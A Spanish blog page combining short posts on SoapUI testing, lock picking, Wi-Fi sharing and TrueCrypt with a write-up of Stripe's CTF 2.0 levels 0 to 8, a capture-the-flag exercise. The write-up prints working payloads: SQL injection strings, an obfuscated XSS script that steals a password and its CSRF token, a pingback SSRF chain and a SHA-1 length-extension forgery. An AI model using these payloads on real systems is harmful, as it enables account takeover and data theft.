Banner 1

SoapUI

0 comentarios

SoapUI es una herramienta de Software Libre gráfica, está basada en Java y sirve para el testeo de Web Service y generación de Clientes De Web Service.
SoapUI permite testear web services de forma facil, ver los resultados. Además, permite facilitar el uso de herramientas comunes para la generación de clientes, como Axis.
Trabajando con web services, y sin interfase gráfica en la aplicación, esta herramienta nos permite automatizar fácilmente las pruebas funcionales y así asegurar la calidad en nuestros proyectos.
Las pruebas funcionales de los web services podrían usarse para más de un propósito:
  • Pruebas unitarias: para validar que cada operación de los servicios funciona como se definió.
  • Prueba de aceptación: para validar que el servicio retorna resultados aceptables según los requerimientos.
  • Pruebas de proceso: para validar que una sucesión de invocaciones del servicio cumple con el proceso de negocio definido.
  • Pruebas de manejo de datos: para validar el comportamiento con las entradas de datos externos al sistema (bases de datos, otros sistemas, uso de otros web services).
  • Pruebas de regresión: para validar el comportamiento post cambios.

Contenido

 [ocultar]

Un paso a paso

1. Tener instalada la última versión bajada de la Web oficial de SoapUI.
2. Crear un nuevo proyecto SoapUI para el proyecto a probar. Donde configurar la url que contiene el WSDL del proyecto.
Creacion de un proyecto
3. Por cada operacion del servicio a probar, crear una peticion. Cada peticion requiere el ingreso de valores para los parámetros definidos. Agregar valores en el XML que nos propone el wizard de la herramienta.
Agregar Peticion
Editar Parametros Peticion
4. El proyecto se persiste en un script XML, que podemos resguardar en el repositorio en el que tengamos el código fuente del proyecto. Y así todo el equipo podrá hacer crecer la prueba funcional automática del proyecto, y de un modo ágil.
5. Con los pasos dados hasta acá, logramos obtener una prueba funcional del proyecto y su documentación.
6. Esta herramienta maneja el concepto de TestSuite, TestCase, TestStep, como lo manejan JUnitJMeter, etc. Un TestSuite sirve para contener un número arbitrario de casos de prueba (TestCases) que pueden ejecutarse secuencialmente o en paralelo. Los TestSteps sirven para ejecutar TestCases secuencialmente. Una vez creadas las peticiones, es posible generar una TestSuite y así automatizar las pruebas funcionales, con el valor agregado de tener pruebas de regresión.
Agregar Peticion a un Caso de Prueba
7. Por cada TestCase es posible hacer validaciones automáticas de los resultados. Entonces, por cada petición, verificar si la respuesta es un fault, o no lo es, o contiene determinado valor, o no lo contiene. Es una buena práctica, en el manejo de web services, que los errores inesperado del sistema (Runtime Exception) viajen en un tag “fault”. Distinto a una respuesta normal del servicio.
Agregar una asercion a la respuesta de una peticion
Tipos de Aserciones
Agregar una asercion de contenido
8. Con las peticiones agregadas a los casos de prueba, se puede realizar una ejecución masiva utilizando la opción Launch TestRunner.
Configurar y Ejecutar Casos de Prueba
Mientras se ejecutan los casos de prueba, se pueden visualizar los pasos de ejecución y un resumen global. En el directorio físico configurado, se genera un archivo por cada caso de prueba con la nomenclatura conteniendo el TestSuite que lo ejecutó, el nombre del caso de prueba, y el resultado de la prueba.

Derechos reservados

Transferencia de datos entre peticiones

En un TestSuite podemos tener un TestCase con Steps, donde cada Step puede ser un request de una operación diferente del web service. Y el valor devuelto en un Step puede ser el valor de entrada en el próximo Step. Más en el tutorial de soapUI
Transferencia de datos entre peticiones

Conclusión

  • Es fácil y rápido crear, ejecutar y guardar los casos de prueba funcional que quieras. Se pueden adaptar y expandir en cualquier momento.
  • Es fácil hacer aserciones. También con expresiones regulares.

Algo más

  • Se puede agregar MockService cuando el web service todavía no está listo.
  • Load Tests permite medir performance sobre los tests funcionales creados.
  • Esta nota está basada en una guia y en un video de la página oficial de SoapUI.

Ver también

Taller de lock picking

0 comentarios
Este taller lo encontré vía hps muy bueno recomiendo ver los tres post.
Si recordáis, cuando anunciábamos el wargame internacionalGlobal CyberLympics había una categoría de ataque de lock picking o ganzuado, en que los participantes tenían que abrir varias cerraduras de distinta dificultad. Esto y una histórica admiración e interés por este arte, han hecho que al fin me decida a comenzar a adentrarme en este apasionante mundo.
Las siguientes entradas que quiero compartir con vosotros, serán un viaje desde mi iniciación desde cero hasta los intentos de apertura de las cerraduras que vaya encontrando, uso de distintas técnicas y en general adquisición de nuevos conocimientos. Eso sí, dado que soy un principiante en lock picking, os pido disculpas de antemano por cualquier error que pueda cometer y os agradezco cualquier apunte o corrección, información adicional, etc. que nos pueda ayudar a mejorar.

A ver hasta dónde llegamos.

Introducción, componentes y funcionamiento normal de una cerradura

Empezamos con la definición principal desde la wikipedia:Lock picking es el arte de abrir una cerradura mediante el análisis y manipulación de sus componentes internos sin utilizar la llave original.

Antes de comenzar a ver diferentes técnicas y herramientas para conseguir una apertura, tenemos que conocer a fondo el mecanismo de la cerradura y los detalles de su funcionamiento. Para ello os aconsejo que empecéis leyendo la Guía MIT del Lock Picking que, aunque fue publicada en el año 1991, se considera todavía la auténtica biblia de este tema.

En los primeros capítulos de esta guía se explica el funcionamiento básico de una cerradura con cámara de pernos (pin tumber locks). Antes de nada, es indispensable que nos familiaricemos con los términos que definen a todas sus partes:

Ahora que conocemos los componentes básicos de una cerradura, pasemos a la parte de su funcionamiento normal. Como veis, los componentes principales en el diseño son una serie de pequeños pines de longitud variable. Estos pines se dividen hacia arriba en pares: pernos y contrapernos. Cada par se reclina en un eje que corre a través del tambor central de la cerradura y en la cubierta alrededor del cilindro o bombín. Los resortes en la tapa de los ejes mantienen los pines en posición.

Cuando no se inserta ninguna llave, el pin inferior o contraperno en cada par está totalmente dentro del tambor y el cilindro, mientras que el pin superior o perno esta en una posición asomando fuera del cilindro. La posición de estos pines impide que el cilindro de la vuelta: los pines lo traban.

Cuando insertas una llave, la serie de muescas en el cuerpo de la llave empuja los pines hasta diversos niveles.

La llave incorrecta empujará a los pines de modo que la mayor parte de los pernos todavía estén en parte en el tambor y en parte en el cilindro. La cerradura seguirá cerrada o bloqueada.

La llave correcta empujará cada par de pines lo suficiente de modo que el punto en donde los dos pines (pernos y contrapernos) se juntan, se alinee perfectamente con el espacio en donde el cilindro y el tambor se juntan (este punto es llamado la línea de corte o esquileo). Sin ninguno de los pines que bloquean el cilindro, se puede rotar libremente y mover el pasador hacia adentro y hacia fuera. La cerradura quedará abierta.

No obstante, si echáis un vistazo a este breve vídeo, veréis más claramente el funcionamiento:




Como veis, este simple diseño del rompecabezas es muy eficaz. Dado que los pines se ocultan dentro de la cerradura, es bastante difícil para la mayoría de la gente mover el cilindro sin la llave correcta. Pero, con mucha práctica, es posible solucionar el rompecabezas por otros medios. En la siguiente entrada, veremos algunas técnicas para forzar esta clase de cerraduras.

Hasta la semana que viene.



Talleres de lock picking#1: Iniciación
#2: Técnicas de apertura

#3: Herramientas de ganzuado



Fuente:http://www.hackplayers.com/2011/08/taller-de-lock-picking-1-iniciacion.html

Wifis.org: Una manera inteligente de compartir nuestra red Wi-Fi

0 comentarios




Ha surgido una nueva manera de compartir nuestra red Wireless, esta nueva web llamada
http://www.wifis.org nos invita a compartir nuestra red a través de ella de una manera
gratuita y sencilla.
Para que queremos compartir nuestra red, muy sencillo, pues para poder ganar algo de dinero
con ella, o simplemente una manera más para comunicarnos con los demás de manera
altruista.
Para poder empezar a compartir debebemos primero saber  que debemos cambiar el nombre
de nuestra red Wi-Fi, o lo que es lo mismo el SSID, pues bien para ello debemos poner como nombre wifis.org/nombre que
queramos. En mi caso lo voy a llamar wifis.org/pumawifi, debemos llamarlo así para que los vecinos sepan que esta red se
comparte a través de wifis.org.


info:

pumawifi.org


TrueCrypt: Tu datos inmunes hasta del FBI

0 comentarios

TreuCrypt: Tu datos inmunes hasta del FBI
La pri­va­ci­dad es algo muy va­lio­so en estos días, pero esto no so­la­men­te se apli­ca en lo que es in­ter­net, sino tam­bién a los datos que te­ne­mos guar­da­dos lo­cal­men­te. Desde cual­quier tipo de In­ge­nie­ría So­cial, quie­nes roban un por­tá­til hasta el téc­ni­co fis­gón que no tiene por qué ver las fotos de tus va­ca­cio­nes, o in­clu­so algún roce con las au­to­ri­da­des, pue­den con­ver­tir­se en un pro­ble­ma para el usua­rio, a menos que reali­ce un ci­fra­do de sus datos.
True­Crypt se ha dado a co­no­cer re­cien­te­men­te, ya que ha de­rro­ta­do al FBI en más de una oca­sión, y como he­rra­mien­ta gra­tui­ta que es, se con­vier­te en la pri­me­ra op­ción de ci­fra­do para mu­chos usua­rios.
Hace unos días una mujer del es­ta­do de Co­lo­ra­do re­ci­bi­do la orden de un juez de en­tre­gar una copia sin ci­frar del disco duro de su por­tá­til con el ob­je­ti­vo de fa­ci­li­tar la in­ves­ti­ga­ción en el pro­ce­so a tra­vés del cual se la acusa de frau­de ban­ca­rio. La mujer des­obe­de­ció la orden del juez in­vo­can­do la pro­tec­ción de la Quin­ta En­mien­da, la cual im­pi­de que una per­so­na deba in­cri­mi­nar­se a sí misma. El juez ar­gu­men­tó que la Quin­ta En­mien­da no se apli­ca­ba en este caso, por­que es­ta­ban so­li­ci­tan­do “una copia sin ci­frar” del disco duro y no “la con­tra­se­ña” para su­perar el ci­fra­do.
El que una per­so­na se nie­gue a obe­de­cer la orden de un juez en un marco de ci­fra­do de datos no es algo nuevo. En oc­tu­bre de 2010, el FBI se­cues­tró dos or­de­na­do­res por­tá­ti­les y cinco dis­cos duros ex­ter­nos per­te­ne­cien­tes a un hom­bre de Flo­ri­da acu­sa­do de for­mar parte de una red de in­ter­cam­bio de por­no­gra­fía in­fan­til. La sor­pre­sa para el FBI llegó cuan­do se en­con­tra­ron que al­gu­nas sec­cio­nes de los sis­te­mas y los dis­cos ex­ter­nos ha­bían sido fuer­te­men­te ci­fra­das con True­Crypt. El FBI no pudo ac­ce­der a las uni­da­des, por lo que un gran ju­ra­do or­de­nó al acu­sa­do que li­be­ra­ra la in­for­ma­ción. El acu­sa­do se negó, tam­bién in­vo­can­do a la Quin­ta En­mien­da, aun­que en este caso el ju­ra­do lo de­cla­ró en desaca­to, en­vián­do­lo a pri­sión.
El punto aquí es que el ci­fra­do de datos es, más allá de las in­ten­cio­nes de sus usua­rios, un mé­to­do efec­ti­vo para pro­te­ger in­for­ma­ción, y que True­Crypt es una de las he­rra­mien­tas por ex­ce­len­cia para ha­cer­lo. El hecho de que el FBI no haya po­di­do su­perar sus mé­to­dos de ci­fra­do con­fir­ma la ro­bus­tez de un pro­gra­ma que tiene en su haber va­rios años de desa­rro­llo. True­Crypt no es im­po­si­ble de de­rro­tar, pero usual­men­te quie­nes des­cu­bren vul­ne­ra­bi­li­da­des en el pro­gra­ma están in­tere­sa­dos en ha­cer­lo más fuer­te. Su úl­ti­ma ver­sión es la 7.1a, lan­za­da du­ran­te los pri­me­ros días de fe­bre­ro, y está dis­po­ni­ble para Win­dows (desde 2000 en ade­lan­te), OS X (desde Tiger en ade­lan­te) y Linux (32 y 64 bits, a par­tir del ker­nel 2.6). True­Crypt tiene va­rios mé­to­dos de ci­fra­do, y la do­cu­men­ta­ción en su sitio ofi­cial es am­plia, al igual que su tu­to­rial por de­fec­to. True­Crypt posee ade­más un mó­du­lo para tra­du­cir el pro­gra­ma al es­pa­ñol.

Solucionario del CTF 2.0 de Stripe

0 comentarios
Por Twitter me enteré el 23 de Agosto que la empresa Stripe había montado un CTF, me sonaba que ya habían hecho uno previamente. Esta vez el CTF era sobre vulnerabilidades Web y tenía del 22 al 29 por lo que me decidí a probar.
https://stripe.com/blog/capture-the-flag-20



Hay 9 niveles donde nos proporcionan una introducción y el código fuente del servicio a atacar. Todo el código que nos proporcionan lo he subido a https://github.com/dalvarezs


Nivel 0

Welcome to Capture the Flag! If you find yourself stuck or want to learn more about web security in general, we've prepared a list of helpful resources for you. You can chat with fellow solvers in the CTF chatroom (also accessible in your favorite IRC client at irc://irc.stripe.com:+6697/ctf).

We'll start you out with Level 0, the Secret Safe. The Secret Safe is designed as a secure place to store all of your secrets. It turns out that the password to access Level 1 is stored within the Secret Safe. If only you knew how to crack safes...
 

You can access the Secret Safe at https://level00-1.stripe-ctf.com/user-czemoskhjv. The Safe's code is included below, and can also be obtained via git clone https://level00-1.stripe-ctf.com/user-czemoskhjv/level00-code.
 

Revisando el código en ruby rápidamente se ve que la vulnerabilidad es una inyección de código SQL en una sentencia con LIKE.

El código vulnerable en el fichero level00.js es:
app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

Enviando el carácter % en el parámetro namespace se obtienen todos los valores almacenados, obteniendo el password MTNzeALlbv.

Nivel 1

Excellent, you are now on Level 1, the Guessing Game. All you have to do is guess the combination correctly, and you'll be given the password to access Level 2! We've been assured that this level has no security vulnerabilities in it (and the machine running the Guessing Game has no outbound network connectivity, meaning you wouldn't be able to extract the password anyway), so you'll probably just have to try all the possible combinations. Or will you...?

You can play the Guessing Game at https://level01-2.stripe-ctf.com/user-fidecfsyim. The code for the Game can be obtained from git clone https://level01-2.stripe-ctf.com/user-fidecfsyim/level01-code, and is also included below.
 

La aplicación espera en el parámetro attempt la contraseña, sin embargo, leyendo el código (esta vez en php) te das cuenta de que es posible enviar un parámetro con el nombre de la variable filename que será el utilizado por el codigo php, en vez de 'secret-combination.txt'. 

De esta forma podemos controlar la condición “if ($attempt === $combination)” obteniendo el password EzErXetuTd.
How did you know the secret combination was" .
               " $combination!?
"; $next = file_get_contents('level02-password.txt'); echo "You've earned the password to the access Level 2:" . " $next
"; } else { echo "Incorrect! The secret combination is not $attempt
"; } } ?>
Payload: https://level01-2.stripe-ctf.com/user-fidecfsyim?attempt=&filename= 

Nivel 2

You are now on Level 2, the Social Network. Excellent work so far! Social Networks are all the rage these days, so we decided to build one for CTF. Please fill out your profile at https://level02-2.stripe-ctf.com/user-uvgjkctugx. You may even be able to find the password for Level 3 by doing so.

The code for the Social Network can be obtained from git clone https://level02-2.stripe-ctf.com/user-uvgjkctugx/level02-code, and is also included below.
 

En este nivel tenemos una Red social donde se permite subir un fichero como imagen para el perfil.
La vulnerabilidad está en que la aplicación permite subir cualquier fichero, por lo que se puede enviar código php. 
En el código dado se hace referencia al fichero password.txt. Solo queda subir un fichero que muestre su contenido:
 

Password HpTCvSQLKQ.

Nivel 3

After the fiasco back in Level 0, management has decided to fortify the Secret Safe into an unbreakable solution (kind of like Unbreakable Linux). The resulting product is Secret Vault, which is so secure that it requires human intervention to add new secrets.

A beta version has launched with some interesting secrets (including the password to access Level 4); you can check it out at https://level03-1.stripe-ctf.com/user-qjthblpqly. As usual, you can fetch the code for the level (and some sample data) via git clone https://level03-1.stripe-ctf.com/user-qjthblpqly/level03-code, or you can read the code below.
 

Accediendo a la web se solicita usuario y contraseña para obtener el secreto. Además, nos dice que el usuario bob almacena el secreto para el paso al nivel 4. 

Revisando el código (ahora toca python) se ve que se ejecuta la sentencia SQL que no está siendo filtrada:
 query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)

Además, se utiliza el hash de la contraseña con un salt:
calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

Cuando usuario y contraseña son correctos, se asigna a la sesión el id del usuario, por lo que  el objetivo de esta prueba es obtener el id del usuario bob para que nos muestre el secreto. Para ello necesitamos que nos asigne su user_id, habiendo pasado las comprobaciones de usuario y contraseña:
 flask.session['user_id'] = user_id

Mediante una inyección SQL en el parámetro username se fuerza a que el id que devuelva sea el del usuario bob. Se envió una petición POST con los parámetros:
username='+UNION+SELECT+id,+'fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603',+'b'+FROM+users+WHERE+username%3d'bob'--&password=a

Estos valores son calculados con el objetivo de que la condición “if calculated_hash.hexdigest() != password_hash:” se cumpla. Para ello se ha calculado los password_hash estableciendo como password 'a' y como salt 'b':
>>> hashlib.sha256('a'+'b').hexdigest()
'fb8e20fc2e4c3f248c60c39bd652f3c1347298bb977b8b4d5903b85055620603'

Recargando la web se obtiene el password ZZFMsfXAhg. Este nivel empezaba a ser más divertido!

Nivel 4

The Karma Trader is the world's best way to reward people for good deeds: https://level04-4.stripe-ctf.com/user-lkfvmdujam. You can sign up for an account, and start transferring karma to people who you think are doing good in the world. In order to ensure you're transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The very active user karma_fountain has infinite karma, making it a ripe account to obtain (no one will notice a few extra karma trades here and there). The password for karma_fountain's account will give you access to Level 5.
 

You can obtain the full, runnable source for the Karma Trader from git clone https://level04-4.stripe-ctf.com/user-lkfvmdujam/level04-code. We've included the most important files below.
 

Por la descripción, el objetivo está claro: conseguir que el usuario karma_fountain nos transfiera crédito para que nos muestre su contraseña. 

En el código se puede ver cómo se realizan las transferencias:
post '/transfer' do
      redirect '/' unless @user

      from = @user[:username]
      to = params[:to]
      amount = params[:amount]

      die("Please fill out all the fields.", :home) unless amount && to
      amount = amount.to_i
      die("Invalid amount specified.", :home) if amount <= 0
      die("You cannot send yourself karma!", :home) if to == from
      unless DB.conn[:users][:username => to]
        die("No user with username #{to.inspect} found.", :home)
      end

      unless user_has_infinite_karma?
        if @user[:karma] < amount
          die("You only have #{@user[:karma]} karma left.", :home)
        end
      end

      DB.conn[:transfers].insert(:from => from, :to => to, :amount => amount)
      DB.conn[:users].where(:username=>from).update(:karma => :karma - amount)
      DB.conn[:users].where(:username=>to).update(:karma => :karma + amount)

El campo from no se pasa por parámetro y no podemos manipularlo. Por otro lado, el registro de usuarios se hace mediante:
post '/register' do
      username = params[:username]
      password = params[:password]
      unless username && password
        die("Please specify both a username and a password.", :register)
      end

      unless username =~ /^\w+$/
        die("Invalid username. Usernames must match /^\w+$/", :register)
      end

      unless DB.conn[:users].where(:username => username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

A diferencia del username, la contraseña no se está validando. 
Por lo tanto, el objetivo es mediante un ataque de Cross-Site Request Forgery forzar a que el usuario karma_fountain nos haga una transferencia. Para ello, creamos un usuario con contraseña: 
  

Y hacemos una donación al usuario karma_fountain para que reciba nuestro código mediante la contraseña. El usuario karma_fountain es un bot que se conecta periódicamente por lo que nos realizará la transferencia.

La password ZXVuTozhJX.

Nivel 5:

Many attempts have been made at creating a federated identity system for the web (see OpenID, for example). However, none of them have been successful. Until today.

The DomainAuthenticator is based off a novel protocol for establishing identities. To authenticate to a site, you simply provide it username, password, and pingback URL. The site posts your credentials to the pingback URL, which returns either "AUTHENTICATED" or "DENIED". If "AUTHENTICATED", the site considers you signed in as a user for the pingback domain.
 

You can check out the Stripe CTF DomainAuthenticator instance here: https://level05-1.stripe-ctf.com/user-ujgjbpdotv. We've been using it to distribute the password to access Level 6. If you could only somehow authenticate as a user of a level05 machine...
 

To avoid nefarious exploits, the machine hosting the DomainAuthenticator has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. Though, you've heard that someone forgot to internally firewall off the high ports from the Level 2 server.
 

Interesting in setting up your own DomainAuthenticator? You can grab the source from git clone https://level05-1.stripe-ctf.com/user-ujgjbpdotv/level05-code, or by reading on below
 

Por la introducción no se tiene muy claro que hay que hacer, revisando el código se extrae:
Necesitamos que se cumpla la condición “if host =~ PASSWORD_HOSTS” para que nos muestre la contraseña:
     user = session[:auth_user]
      host = session[:auth_host]
      if user && host
        output += " You are authenticated as #{user}@#{host}. 

"
        if host =~ PASSWORD_HOSTS
          output += " Since you're a user of a password host and all,"
          output += " you deserve to know this password: #{PASSWORD} 

"
        end
      end

# Run with the production file on the server
    if File.exists?('production')
      PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
      ALLOWED_HOSTS = /\.stripe-ctf\.com$/
    else
      PASSWORD_HOSTS = /^localhost$/
      ALLOWED_HOSTS = //
    end

Por lo tanto, hosts tiene que seguir el patrón /^level05-\d+\.stripe-ctf\.com$/

Para asignar un valor a la variable host:
if authenticated?(body)
        session[:auth_user] = username
        session[:auth_host] = host
        return "Remote server responded with: #{body}." \
               " Authenticated as #{username}@#{host}!"

se debe cumplir “if authenticated?(body)”
def authenticated?(body)
      body =~ /[^\w]AUTHENTICATED[^\w]*$/
    end

Después de esto el objetivo es conseguir que al hacer una petición la variable hosts cumpla el patrón anterior. Por la descripción sabemos que la máquina solo puede hacer peticiones a servidores con dominio stripe-ctf.com, por lo que usaremos el servidor del nivel 2 para subir un fichero con el texto “-AUTHENTICATED”.
Finalmente se ejecutó una petición POST con:

pingback=https://level05-1.stripe-ctf.com/user-ujgjbpdotv/?pingback=https://level02-2.stripe-ctf.com/user-uvgjkctugx/uploads/lvl5.txt&username=david&password=2 

Nivel 6:

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most steamlined way of sharing updates with your friends. You can access your Streamer instance here: https://level06-2.stripe-ctf.com/user-axbechwixy

The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you've learned that the holder of the password to access Level 7, level07-password-holder, is the first Streamer user.
 

As well, level07-password-holder is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.
 

Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at git clone https://level06-2.stripe-ctf.com/user-axbechwixy/level06-code. We've also included the most important files below.
 

Tras leer la descripción, el objetivo está claro:

Necesitamos que el usuario  level07-password-holder publique su contraseña en los mensajes. Sin embargo, esta vez para postear un mensaje hay que conocer un token no predecible para evitar ataques Cross-Site Request Forgery.

Revisando el código se ve que únicamente se está haciendo un filtrado de los caracteres ' y “:
 if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end

Por lo que es posible realizar un Cross-Site Scripting inyectando un código que obtenga la contraseña, y publique un mensaje extrayendo el valor del token.

Los mensajes que se muestran a los usuarios están incluidos en un JSON:
  var post_data = [{"time":"Fri Aug 24 11:23:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];

Por lo que el payload queda:
$.ajax({
                    type: 'GET',
                        url: 'user_info',
                        success: function(msg){
                                    var a =$('[name=_csrf]').val();
                                    var msg2= msg.replace(/"/g, 'bbbbbbbbbbbbbb');
                                    var msg3=msg2.replace(/'/g, 'eeeeeeeeeeeeeee');
                                    $.ajax({
                                        type: 'POST',
                                        url: 'ajax/posts',
                                        data: {
                                              'title': 'titulo',
                                              'body': msg3,
                                              '_csrf': a
                                              },
                                        success: function(msg){
                                                    alert("fuck CSRF");
                                         }
                                    });
                        }
                });

Mediante la petición a user_info, se obtiene la contraseña y con ella se realiza una petición de publicar un mensaje extrayendo el valor del token. Además, como la contraseña del usuario contiene caracteres no permitidos ( ' y “), nos lo dicen en la descripción, se reemplazan  por otro código.

Finalmente hay que codificar el código jquery para evitar problemas con las comillas y se envía la siguiente petición POST:
title=testing&body=}]</script><script>eval(String.fromCharCode(36, 46, 97, 106, 97, 120, 40, 123, 116, 121, 112, 101, 58, 32, 39, 71, 69, 84, 39, 44, 117, 114, 108, 58, 32, 39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39, 44, 32, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 109, 115, 103, 41, 123, 32, 118, 97, 114, 32, 99, 115, 114, 102, 32, 61, 36, 40, 39, 91, 110, 97, 109, 101, 61, 95, 99, 115, 114, 102, 93, 39, 41, 46, 118, 97, 108, 40, 41, 59, 32, 118, 97, 114, 32, 109, 115, 103, 50, 61, 32, 109, 115, 103, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 34, 47, 103, 44, 32, 39, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 98, 39, 41, 59, 32, 118, 97, 114, 32, 109, 115, 103, 51, 61, 109, 115, 103, 50, 46, 114, 101, 112, 108, 97, 99, 101, 40, 47, 39, 47, 103, 44, 32, 39, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 101, 39, 41, 59, 32, 36, 46, 97, 106, 97, 120, 40, 123, 32, 116, 121, 112, 101, 58, 32, 39, 80, 79, 83, 84, 39, 44, 32, 117, 114, 108, 58, 32, 39, 97, 106, 97, 120, 47, 112, 111, 115, 116, 115, 39, 44, 32, 100, 97, 116, 97, 58, 32, 123, 32, 39, 116, 105, 116, 108, 101, 39, 58, 32, 39, 116, 105, 116, 117, 108, 111, 39, 44, 32, 39, 98, 111, 100, 121, 39, 58, 32, 109, 115, 103, 51, 44, 32, 39, 95, 99, 115, 114, 102, 39, 58, 32, 99, 115, 114, 102, 32, 125, 44, 32, 115, 117, 99, 99, 101, 115, 115, 58, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 109, 115, 103, 41, 123, 32, 97, 108, 101, 114, 116, 40, 34, 102, 117, 99, 107, 32, 67, 83, 82, 70, 34, 41, 59, 125, 125, 41, 59, 125, 125, 41, 59))</script><script>var t = [{&_csrf=Z%2FTINtE2srx4T5WwCFSv6zkOrRJo3NDUk8T5L5%2Fi27g%3D

Cuando el usuario level07-password-holder se conecte obtendremos el password 'frHrvqmmtcXV".

Nivel 7:

Welcome to the penultimate level, Level 7.
WaffleCopter is a new service delivering locally-sourced organic waffles hot off of vintage waffle irons straight to your location using quad-rotor GPS-enabled helicopters. The service is modeled after TacoCopter, an innovative and highly successful early contender in the airborne food delivery industry. WaffleCopter is currently being tested in private beta in select locations.

Your goal is to order one of the decadent Liège Waffles, offered only to WaffleCopter's first premium subscribers.
 

Log in to your account at https://level07-2.stripe-ctf.com/user-vnnjojikfr with username ctf and password password. You will find your API credentials after logging in. You can fetch the code for the level via
 
git clone https://level07-2.stripe-ctf.com/user-vnnjojikfr/level07-code, or you can read it below. You may find the sample API client in client.py particularly helpful.

Revisando el código destaca:
 def _signature(self, message):
        h = hashlib.sha1()
        h.update(self.api_secret + message)
        return h.hexdigest()

y viendo las peticiones que se realizan para hacer los pedidos:
https://level07-2.stripe-ctf.com/user-vnnjojikfr/orders
count=1&lat=1&user_id=5&long=1&waffle=liege|sig:0eeddfae9869844170ba0ceeb871c562152dd251

se extrae que es vulnerable a un ataque hash length extension. Para estos ataques hay una herramienta que nos hace todo el trabajo gracias a vnsecurity (http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack/). Solo hace falta conocer la longitud de la contraseña, mensaje original, hash original y el mensaje que queremos añadir. El tamaño de la contraseña lo podemos obtener del código, aunque un ataque de fuerza bruta hubiera valido:
def add_waffles(level_password):
    add_waffle('liege', 1, level_password)
    add_waffle('dream', 1, rand_alnum(14))
    add_waffle('veritaffle', 0, rand_alnum(14))

Como se permitía acceder a los pedidos de otros usuarios, con una petición a https://level07-2.stripe-ctf.com/user-vnnjojikfr/logs/1 es posible obtener el mensaje original  “count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo”

Ejecutamos la herramienta y enviamos el resultado:
python sha-padding.py 14 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' '0cae013e74d62f65b1802c5d780e7180983d8dbd' '&waffle=liege'

https://level07-2.stripe-ctf.com/user-vnnjojikfr/orders
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

Nivel 8:

El nivel más complejo con diferencia. Por cuestiones personales, solo pude estar con el CTF el 23-24 y 28-29, cuando desbloquee el nivel ya había dos pistas. No se si estaban dadas desde el principio o fue pasados los días:

Welcome to the final level, Level 8.
HINT 1: No, really, we're not looking for a timing attack.
HINT 2: Running the server locally is probably a good place to start. Anything interesting in the output?
UPDATE: If you push the reset button for Level 8, you will be moved to a different Level 8 machine, and the value of your Flag will change. If you push the reset button on Level 2, you will be bounced to a new Level 2 machine, but the value of your Flag won't change.

Because password theft has become such a rampant problem, a security firm has decided to create PasswordDB, a new and secure way of storing and validating passwords. You've recently learned that the Flag itself is protected in a PasswordDB instance, accesible at https://level08-2.stripe-ctf.com/user-veyrdiujkx/.

PasswordDB exposes a simple JSON API. You just POST a payload of the form {"password": "password-to-check", "webhooks": ["mysite.com:3000", ...]} to PasswordDB, which will respond with a {"success": true}" or {"success": false}" to you and your specified webhook endpoints.
 

(For example, try running curl https://level08-2.stripe-ctf.com/user-veyrdiujkx/ -d '{"password": "password-to-check", "webhooks": []}'.)
 

In PasswordDB, the password is never stored in a single location or process, making it the bane of attackers' respective existences. Instead, the password is "chunked" across multiple processes, called "chunk servers". These may live on the same machine as the HTTP-accepting "primary server", or for added security may live on a different machine. PasswordDB comes with built-in security features such as timing attack prevention and protection against using unequitable amounts of CPU time (relative to other PasswordDB instances on the same machine).
 

As a secure cherry on top, the machine hosting the primary server has very locked down network access. It can only make outbound requests to other stripe-ctf.com servers. As you learned in Level 5, someone forgot to internally firewall off the high ports from the Level 2 server. (It's almost like someone on the inside is helping you — there's an sshd running on the Level 2 server as well.)
 

To maximize adoption, usability is also a goal of PasswordDB. Hence a launcher script, password_db_launcher, has been created for the express purpose of securing the Flag. It validates that your password looks like a valid Flag and automatically spins up 4 chunk servers and a primary server.
 

